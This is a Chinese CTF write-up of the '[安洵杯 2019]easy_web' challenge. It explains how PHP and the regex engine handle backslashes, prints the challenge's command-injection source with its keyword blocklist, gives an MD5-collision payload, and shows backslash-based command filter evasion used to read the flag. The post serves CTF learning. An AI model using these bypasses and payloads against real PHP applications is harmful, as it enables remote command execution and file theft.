[安洵杯 2019]easy_web(PHP反斜杠匹配问题)

最新推荐文章于 2022-10-09 15:57:33 发布
最新推荐文章于 2022-10-09 15:57:33 发布
阅读量246 收藏
点赞数
分类专栏: wp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44111753/article/details/113642566
版权

知识点:

  • linux命令绕过

    cat flag --> ca\t fl\ag

  • 强类型绕过md5

    if((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b']))

    payload

    a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2&b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2

  • PHP反斜杠匹配问题

php中preg_match要匹配\时候,需要四个\

\\\\解析经过两个过程
1、php解析
第一个'\'转义第二个'\',转义后的字符串为'\'
第二个'\'转义第三个'\',转义后的字符串为'\'
解析完后的字符串为\\
2、正则解析器解析
很明显,剩下的\\解析为\
题解:
解析img参数值TXpVek5UTTFNbVUzTURabE5qYz0,解析过程两次base64+一次hex,得到555.png,访问555.png
在这里插入图片描述
说明img可以传参,进行文件读取,尝试读取flag.php,没有反应,应该是过滤了flag,先读取index.php文件源码吧(index.php要进行一次hex+两次base64加密)得到如下源码:

<?php
error_reporting(E_ALL || ~ E_NOTICE);
header('content-type:text/html;charset=utf-8');
$cmd = $_GET['cmd'];
if (!isset($_GET['img']) || !isset($_GET['cmd'])) 
    header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');
$file = hex2bin(base64_decode(base64_decode($_GET['img'])));

$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
if (preg_match("/flag/i", $file)) {
    echo '<img src ="./ctf3.jpeg">';
    die("xixi~ no flag");
} else {
    $txt = base64_encode(file_get_contents($file));
    echo "<img src='data:image/gif;base64," . $txt . "'></img>";
    echo "<br>";
}
echo $cmd;
echo "<br>";
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
    echo("forbid ~");
    echo "<br>";
} else {
    if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
        echo `$cmd`;
    } else {
        echo ("md5 is funny ~");
    }
}

?>
<html>
<style>
  body{
   background:url(./bj.png)  no-repeat center center;
   background-size:cover;
   background-attachment:fixed;
   background-color:#CCCCCC;
}
</style>
<body>
</body>
</html>

md5绕过上面知识点中已经说了
重点在preg_match过滤了,linux命令可以通过增加\来过滤,但是|\\|\\\\|这一串好像有尝试过滤\
分析一下:
php解析后:
第一个反斜杠转义第二个\,依次类推,第三个转义第四个…
得到字符串|\|\\|
正则解析器解析:
第一个反斜杠转义|第二个反斜杠转义\
得到字符串||\|即实现了对|\的匹配,而不是单独对\的匹配
测试如下
在这里插入图片描述
所以该题可以用\来绕过linux命令
接下来构造cmd的值
dir%20/查看目录
ca\t%20/fl\ag读取flag文件
在这里插入图片描述
另一种读取方式sort%20/flag

sort:将文件的每一行作为一个单位,相互比较,比较原则是从首字符向后,依次按ASCII码值进行比较,最后将他们按升序输出

行于其野
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF训练打卡
Leo8283的博客
04-26 637
BJDCTF2020]ZJCTF,不过如此 首先 ?text=data://text/plain,I%20have%20a%20dream&file=php://filter/read=convert.base64- encode/resource=next.php 或者 者 https://www.cnblogs.com/wangtanzhi/p/12328083.html https://xz.aliyun.com/t/2557 payload:/S*=${phpinf
PHP中MD5常见绕过
iczfy585的博客
05-12 1万+
PHP中md5的绕过md5($password,true)的SQL注入问题两变量值不相等,md5计算散列值后相等的绕过MD5碰撞 函数: md5($string,bool): 得到一个字符串散列值。 其中第二个参数默认为false,表示该函数返回值是32个字符的十六进制数。 若指定为true,则表示函数返回的是16字节的二进制格式(这样通过浏览器解析会出现乱码)。 md5($password,true)的SQL注入问题 这里需要注意一下MYSQL中的一些数值比较的特征。 1.当数字和字符串比较时,若字符
buuctf刷题之旅之web(二)
qq_50589021的博客
08-19 3404
2021-5-23 [BUUCTF 2018]Online Tool 题目: <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; } if(!isset($_GET['host'])) { highlight_file(__FILE__); } else { $host = $_GE
总结ctf中 MD5 绕过的一些思路
y0un9er
10-02 1万+
总结ctf中 MD5 绕过的一些思路,包括在PHP弱类型比较中 0e 、数组、MD5后的值等于原值,以及强比较的MD5碰撞
buuctf(探险3)
qq_62046696的博客
08-13 948
if(!strstr($get_flag," ")){ get传参进入的,里面没有空格、str_ireplace(子字符串忽略大小写替换)第二行,就是把get_flag中的cat 换成wctf20220,说白了就是过滤cat那我们先用ls查一下目录可是并没有什么回显,不知道我是哪错了看了大佬解释,说是传入的2e4不需要空格,这些都会自动加上出来了,但是我们查找目录 cat flag中间一定会有空格,的这里肯定是需要一种别的手段绕过一下。...
PHP去掉json字符串中的反斜杠\及去掉双引号前的反斜杠
10-23
在处理PHP中的JSON字符串时,经常遇到的问题是字符串中包含了不应有的转义字符,特别是反斜杠`\`。这通常发生在通过AJAX传递JSON数据到服务器时,浏览器或者中间件为了转义可能会在数据中加入反斜杠。本内容将详细...
解决Python正则表达式匹配反斜杠''\''问题
10-16
在Python中,正则表达式匹配反斜杠('\')是一个经常让初学者感到困惑的问题反斜杠在Python字符串中是一个转义字符,用于表示特殊字符,例如换行符('\n')或者制表符('\t')。在正则表达式中,反斜杠也扮演着...
PHP正则匹配反斜杠'\'和美元'$'的方法
10-20
在本篇文章中,将详细探讨如何在PHP正则表达式中匹配反斜杠'\'和美元'$'这两种特殊字符。由于这些字符在正则表达式中有特定的功能,它们被称为元字符,因此要匹配它们本身就需要一些特殊处理。 首先,让我们来看看...
php输出反斜杠的实例方法
01-02
按常规写法,我们要输出反斜杠,那就在输出字符串里直接写上反斜杠的符号,但这样可以吗?我们尽管试一下。 运行这个代码的页面,发现页面报错了,报的是语法错误。 为什么会这样,从php文档里我们可以看到,这个...
buu web 41-44 writeup
Sk1y的博客
03-02 549
buu web 41-44 writeup [安洵 2019]easy_web [BJDCTF2020]Mark loves [BJDCTF2020]The mystery of ip [GWCTF 2019]我有一个数据库 相关资料
PHP中的MD5()函数漏洞
John_lain的博客
10-28 3644
文章目录1. MD5函数漏洞2.PHP特性3.MD5碰撞 1. MD5函数漏洞 $_GET['a'] != $_GET['b'] &amp;&amp; MD5($_GET['a']) == MD5($_GET['b']) 要让上面的等式成立,a和b的值不能相等,但是md5后的值相等。因为是==比较,只判断值是否相等,不判断类型是否相同。如果类型不同先转换为相同类型再进行比较而PHP在处理哈希字...
BUUCTF easy web中md5的问题
qq_44927883的博客
12-03 1487
看了大家的wp,在绕过下面的md5的时候,都是通过两个特殊的值绕过的,但经测后发现不对。 if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) { echo `$cmd`; } else { echo ("md5 is funny ~"); } 启动本地php跑一下 <?php echo (string)$_GET['a']; echo "
MD5绕过
qq_63267612的博客
07-03 695
1.0e绕过 弱比较会把0exxxx当做科学计数法,不管后面的值为任何东西,0的任何次幂都为0 要求get获取的a和b的值要求不相等,但要求其md值相同2. 数组绕过 md5()函数计算的是一个字符串的哈希值,对于数组则返回false 传入 可以看到,MD5一个数组返回了null,null==null,成功绕过 3. 强类型绕过 因为强类型比较,不仅比较值,还比较类型,0e会被当做字符串,所以不能用0e来进行 但是可以用MD值完全相同的字符来进行绕过 上面的方法都不能用了,百度发现是强类型绕过 payloa
PHP】MD5比较漏洞 弱比较、强比较、强碰撞
EC_Carrot的博客
11-06 6450
前言 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! 细节可能还需参考一下师傅这篇文章: https://www.cnblogs.com/kuaile1314/p/11968108.html 弱比较 if($_POST['param1']!=$_POST['param2']&& md5($_POST['param1'])==md5($_POST['param2'])){ die("succ
BUUCTF 18
qq_52431855的博客
01-31 200
知识点 sort命令: sort将文件的每一行作为一个单位,相互比较,比较原则是从首字符向后,依次按ASCII码值进行比较,最后将他们按升序输出。 dir命令: 显示目录的文件和子目录的列表。 详情可见 数据库: 可以输入 phpmyadmin 直接查看数据库,可以查看版本等等 还学习到了 phpmyadmin4.8.1后台任意文件包含漏洞 18-1[安洵 2019]easy_web 做题思路 无意中发现了, 然而却不知道如何走,去看看大佬WP 大佬敏感发现,i...
md5相关比较
m0_51428325的博客
11-16 1124
弱比较 if($_POST['a']!=$_POST['b']&& md5($_POST['a'])==md5($_POST['b'])){ die("success!"); } 在这样的弱比较里,0e开头的会被识别成科学计数法,结果均为0,比较时0=0为true绕过 payload: a=QNKCDZO&b=s878926199a 常用md5加密后为0的字符串: 240610708,aabg7XSs,aabC9RqS s878926199...
CTFShow 2022——新手wp WEB题目
qq_60878323的博客
10-09 1141
小艾大佬的投稿支持 web AK了
[BUUCTF]刷题记录6
Huamang的博客
04-04 454
[WUSTCTF2020]朴实无华 目录扫描 intval函数的科学记数法绕过 MD5加密后与加密前相等 直接去扫目录,扫到了fl4g.php if (isset($_GET['num'])){ $num = $_GET['num']; if(intval($num) < 2020 && intval($num + 1) > 2021){ echo "我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.&lt
CTF中常见php-MD5()函数漏洞
热门推荐
等风来
10-11 2万+
CTF中常见php-MD5()函数漏洞 1.数字与字符串之间的比较 var_dump( 0 == "a" ); var_dump( "0" == "a" ); 第一个返回的是 true ,第二个返回的是 false 因为php把字母开头的转化为整型时,转化为0, 前面数字后面字母的话就只取到第一个字母出现的位置之前(如intval(’'123abd45gf)结果为123) 2.MD5函数漏洞 $...
php json_encode双引号前反斜杠
最新发布
09-06
PHP中,使用json_encode()函数将数据编码为JSON字符串时,如果遇到特殊字符,会在双引号前面加上反斜杠进行转义。 这是因为JSON字符串中特殊字符需要进行转义,以确保在解析时能正确解析。例如,双引号字符必须进行转义,否则可能会被误认为是字符串的结束。 举个例子,如果有一个包含特殊字符的字符串,比如说字符串中包含双引号,PHP的json_encode()函数会在双引号前加上反斜杠进行转义,如下所示: $myString = 'This is a "sample" string.'; $jsonString = json_encode($myString); // 输出结果: "This is a \"sample\" string." 在编码后的JSON字符串中,双引号前面的反斜杠表示双引号是字符串中的一部分,而不是字符串的结束符号。 这样做是为了确保JSON数据的完整性,以便在解析JSON时可以正确识别特殊字符,并还原为原始数据。这在传输数据或与其他系统交互时非常重要,确保数据准确无误。 总之,PHP的json_encode()函数会在特殊字符的双引号前加上反斜杠进行转义,以确保JSON数据的完整性和正确性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值